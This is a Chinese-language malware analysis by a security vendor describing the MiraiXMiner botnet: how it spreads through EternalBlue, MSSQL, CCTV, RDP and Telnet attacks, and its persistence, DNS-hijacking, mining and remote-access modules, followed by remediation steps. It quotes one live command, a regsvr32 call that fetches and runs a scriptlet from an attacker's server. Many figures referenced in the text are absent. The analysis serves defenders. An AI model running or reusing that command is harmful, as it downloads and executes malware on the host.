融合多种病毒家族功能特点的MiraiXMiner物联网僵尸网络

近日，深信服安全团队跟踪到一新型的物联网僵尸网络，其融合了多种已知病毒家族的特点，包括Mirai物联网僵尸网络病毒、MyKings僵尸网络病毒、远控木马、挖矿等，传播方式包括永恒之蓝漏洞、闭路电视物联网设备漏洞、MSSQL漏洞、RDP爆破和Telnet爆破等。

深信服已将其命名为MiraiXMiner，并且制定了完善的防御措施。

0x01攻击流程

1. 病毒母体msinfo.exe通过注册服务&写入恶意代码到数据库的手段，实现持久化攻击。

2. 根据C&C命令从云端下载任意的攻击模块，此次的攻击模块为csrs.exe。

3. 添加恶意特权账户admin$。

4. 从黑客服务器下载三个子模块：后门模块、DNS劫持模块、净化&下载挖矿模块。

5. 后门模块up.rar经过分析发现为有名的BootKit远控木马。

6. u.exe通过篡改DNS配置文件达到劫持DNS的目的。

7. 净化模块upsnew2.exe的功能很多，除了杀死同行病毒，添加自启动项以外，还会停止Windows自动更新服务，以更稳定地控制受害主机。最重要的，该模块后续还会不定期下载并执行挖矿程序。

8. 使用扫描 工具 和Mirari攻击库对内网设备进行大范围攻击。

9. 最后，母体msinfo.exe会连接云端，自动更新病毒，实时下载最新的攻击模块。

0x02传播模块

扫描445端口，如下所示：

通过内置的masscan程序进行扫描，如下所示：

通过内置的nmap程序进行扫描行为，如下所示：

对扫描到的目标，相应的攻击行为，如下所示：

执行永恒之蓝攻击行为CrackerMS17010，如下所示：

攻击CCTV物联网设备漏洞CrackerCCTV，如下所示：

攻击MSSQL漏洞CrackerMSSQL，如下所示：

然后执行下面的数据库Payload命令过程，如下所示：

将如下恶意代码写入数据库存储过程中，如下所示：

恶意代码如下所示：

对RDP进行攻击CrackerRDP，如下所示：

对Telnet进行攻击CrackerTelnet，如下所示：

0x03 创建admin$账号

从服务器上下载相应的配置文件，然后解密，如下所示：

然后解密出相应的XML文件，进行下载执行恶意程序操作，如下所示：

下载回来的CSRS是一个 python 脚本编写后生成的EXE，主要是一个Exploit，用于通过MS17010漏洞，添加帐号，如下所示：

添加之后的主机，如下所示：

执行MS17010漏洞攻击，如下所示：

攻击的参数，如下所示：

0x04 挖矿与远控木马

下载恶意程序，能过start regsvr32 /s /u /n /i:http://up.ms1128.site:8888\\s1.txt scrobj.dll，如下所示：

解密出上面的XML脚本，如下所示：

Upsnew2释放远控木马item.dat以及c3.bat脚本。

c3.bat脚本功能如下：

清除其他病毒。

开启MSSQLSERVER。

在注册表以及任务计划中添加自启动。

关闭自动更新。

加载远控木马。

配置防火墙策略，关闭135、137、138、139、445端口，防止再被其他病毒感染。

0x05 解决方案

1、隔离感染主机：已中毒计算机尽快隔离，关闭所有网络连接，禁用网卡。

2、切断传播途径：关闭潜在终端的SMB 445等网络共享端口，关闭异常的外联访问。

3、查找攻击源：借助深信服安全感知平台检测内网攻击源。

4、查杀病毒：推荐使用深信服终端安全检测响应平台EDR进行查杀，病毒库需升级到20181204版本。

5、修补漏洞：打上永恒之蓝MS17-010等漏洞相关补丁。